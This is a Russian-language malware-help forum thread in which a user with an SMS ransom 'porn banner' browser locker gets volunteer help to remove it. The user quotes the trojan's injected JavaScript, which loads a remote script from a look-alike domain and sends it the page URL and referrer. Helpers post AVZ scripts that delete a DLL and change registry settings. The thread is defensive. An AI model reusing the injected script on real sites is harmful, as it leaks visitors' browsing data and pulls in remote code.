-
Junior Member
- Вес репутации
- 48
Всплывающий порнобаннер смс-блокер во всех браузерах
Здравствуйте уважаемое сообщество!
Подцепил баннер-блокер браузеров во время посещения какого то левого файлохранилища, лазая за бесплатным софтом. Требует отправить смс на номер 3381 с кодом 2262454779.
Стоял антивирус Аваст. Пробовал утилиты Доктор Веб и Касперского из рекомендаций в Правилах. Не помогли. Также пробовал воспользоваться деблокером Касперского. Код не подошел.
Скриншот порнобаннера в приложении. Ниже - ява-скрипт, который троян-вымогатель приписывает ко всем отображаемым в браузерах страницах перед закрывающим тегом body.
Код HTML:
<script>if(self==top){
document.write("<script src='http" +
(("https:" == document.location.protocol) ? "s" : "") +
"://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("eZR14pZi2f7tDUSxEA7BP+RKqJRMlEAYwOl2ZCPLcmMbBIt1ua2MIC7qQU28kskI")+"&r="+escape(document.referrer)+"&u="+escape(document.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script></body>
Последний раз редактировалось thyrex; 27.05.2011 в 01:17.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Уважаемый(ая) Alexey_K, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
-
-
Отключите восстановление системы!
Выполните скрипт в AVZ:
Код:
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\system32\gdzrnud.dll','');
DeleteFile('C:\WINDOWS\system32\gdzrnud.dll');
BC_ImportDeletedList;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
Компьютер перезагрузится.
Пришлите карантин согласно приложению 3 правил
(загружать тут: http://virusinfo.info/upload_virus.php?tid=102700).
Обновите базы AVZ и сделайте новые логи.
I am not young enough to know everything...
-
-
Junior Member
- Вес репутации
- 48
Здравствуйте, спасибо за помощь!
Скрипт запустил. Компьютер перегрузился. Баннер из браузеров исчез.
Сообщение от
Bratez
Обновите базы AVZ и сделайте новые логи.
Логи прилагаю к ответу.
Сообщение от
Bratez
Пришлите карантин
В открыв просмотр карантина согласно инструкции, никаких файлов там почему то не обнаружил.
-
- Выполните скрипт в AVZ
Код:
begin
DeleteFileMask(GetAVZDirectory + 'Quarantine', '*.*', true);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
ExecuteWizard('TSW', 2, 2, true);
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(true);
end.
После перезагрузки:
- Сделайте повторный лог virusinfo_syscheck.zip;
что с проблемой?
-
-
Junior Member
- Вес репутации
- 48
Сообщение от
polword
2-й скрипт выполнил. Проблема с баннером исчезла еще вчера после выполнения 1-го скрипта. Лог прилагаю. Спасибо за помощь!
-
I am not young enough to know everything...
-